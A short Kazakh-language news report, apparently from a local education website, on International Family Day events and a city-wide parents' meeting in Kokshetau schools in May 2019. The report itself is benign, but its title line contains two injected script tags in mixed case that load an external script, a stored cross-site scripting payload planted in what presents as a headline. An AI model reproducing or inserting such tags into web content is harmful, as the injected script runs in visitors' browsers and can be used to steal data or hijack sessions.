Халықаралық отбасы күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
16.05.2019
Көкшетау қаласының білім беру ұйымдарында «Халықаралық Отбасы күнін» мерекелеу қарсаңында тақырыптық дәрістер, «Отбасы және отбасылық құндылықтар», «Отбасы – бала тәрбиесінің ең алғашқы ұжымы», «Мен және менің отбасым» айдарымен сынып сағаттары, сәндік-қолданбалы өнер көрмелері, шығармашылық топтардың концерттері, кітапханаларда тақырыптық экспозициялар өткізілді.
Сонымен қатар қала мектептерінде ұйымдастырылған «Әкем, анам және мен-спорттық отбасы» спорттық іс-шарасы балалар мен ата-аналарды ризашылық пен көтеріңкі көңіл-күйге бөледі.
Ағымдағы жылғы 15 мамыр күні Көкшетау қаласының 25 жалпы білім беретін мектептерінде 3000 астам ата-аналарды қамтыған Халықаралық Отбасы күніне арналған бір мезгілде жалпы - ұлттық ата-аналар жиналысы болып өтті. Тақырыбы «Отбасылық тәрбие – өскелең ұрпақтың азаматтылығын қалыптастыру негізі» болып алынған жиналыс барысында ата-аналар назарына бейнесюжеттер ұсынылды.
Ата – аналар жиналысының мақсаты-ата-аналарды отбасылық тәрбие мәселелерін талқылауға тарту, олардың жауапкершілігін және бала тәрбиесіндегі рөлін арттыру.
Ата-аналар жиналысының күн тәртібіне шығарылған
- Өскелең ұрпақты тәрбиелеудегі «Рухани жаңғыру» бағдарламасының рөлі;
- Ата-аналар мен мектептің өзара іс-қимылын күшейтудегі отбасылық құндылықтар;
- 9-11 сынып оқушыларын қорытынды аттестаттау;
- Оқу жылының қорытындысын шығару, білім алушылардың білім сапасы;
- Мектеп басқаруындағы қамқоршылық кеңесінің қызметі;
- Қамқоршылық кеңестер және білім беру ұйымдарының ата-аналар комитеті
- Ата-аналардың орта білім беру ұйымдарының қоғамдық өміріне қатысуы (әкелер клубы, қариялар кеңесі және т.б.) мәселелер талқыланды.